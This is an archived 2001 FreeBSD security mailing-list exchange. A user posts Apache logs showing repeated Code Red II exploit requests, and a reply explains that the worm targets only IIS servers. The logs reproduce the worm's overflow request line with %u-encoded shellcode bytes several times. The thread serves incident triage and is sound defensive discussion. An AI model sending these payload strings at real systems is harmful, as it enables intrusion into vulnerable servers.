From owner-freebsd-security Wed Aug 8 18:32:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from intense.net (server.intense.net [199.217.236.1]) by hub.freebsd.org (Postfix) with ESMTP id 1A16837B401 for ; Wed, 8 Aug 2001 18:32:01 -0700 (PDT) (envelope-from bobber@intense.net) Received: from bob ([209.248.134.245]) by intense.net (8.8.8/8.8.8) with SMTP id UAA90616; Wed, 8 Aug 2001 20:31:59 -0500 (CDT) Message-ID: <007201c12073$270bd7e0$6c01a8c0@mpcsecurity.com> From: "Robert Herrold" To: "faSty" , References: <20010808182543.A42490@i-sphere.com> Subject: Re: should I concerned? Date: Wed, 8 Aug 2001 20:31:58 -0500 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-Mimeole: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org That's the code red (II) that's affecting only IIS (Windows NT Servers) ----- Original Message ----- From: "faSty" To: Sent: Wednesday, August 08, 2001 8:25 PM Subject: should I concerned? > Hi guys, > > I noticed the httpd's log (errors and access), someone tried expliot > the security hole on apache webserver and I dont know what this is. > > my webserver apache version is > > Server version: Apache/1.3.19 (Unix) > Server built: May 17 2001 20:14:06 > > > Please help. thanks > > PS. logs below. > > -trev > > -- httpd-access.log -- > 208.185.233.230 - - [08/Aug/2001:14:39:03 -0700] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858 %ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53 1b%u53ff%u0078%u0000%u00=a HTTP/1.1" 400 - "-" "-" > 208.185.233.230 - - [08/Aug/2001:14:55:51 -0700] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858 %ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53 1b%u53ff%u0078%u0000%u00=a HTTP/1.1" 400 - "-" "-" > 208.185.233.230 - - [08/Aug/2001:15:29:28 -0700] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858 %ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53 1b%u53ff%u0078%u0000%u00=a HTTP/1.1" 400 - "-" "-" > 208.185.233.230 - - [08/Aug/2001:17:13:35 -0700] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858 %ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53 1b%u53ff%u0078%u0000%u00=a HTTP/1.1" 400 - "-" "-" > > -- end snip -- > > -- httpd-error.log -- > [Wed Aug 8 14:39:03 2001] [error] [client 208.185.233.230] Invalid URI in request XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.1 > [Wed Aug 8 14:55:51 2001] [error] [client 208.185.233.230] Invalid URI in request XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.1 > [Wed Aug 8 15:29:28 2001] [error] [client 208.185.233.230] Invalid URI in request XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.1 > [Wed Aug 8 17:13:35 2001] [error] [client 208.185.233.230] Invalid URI in request XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.1 > [Wed Aug 8 18:09:29 2001] [notice] caught SIGTERM, shutting down > > -- i shut the webserver down in case till i find out what this is. > -- snip end -- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message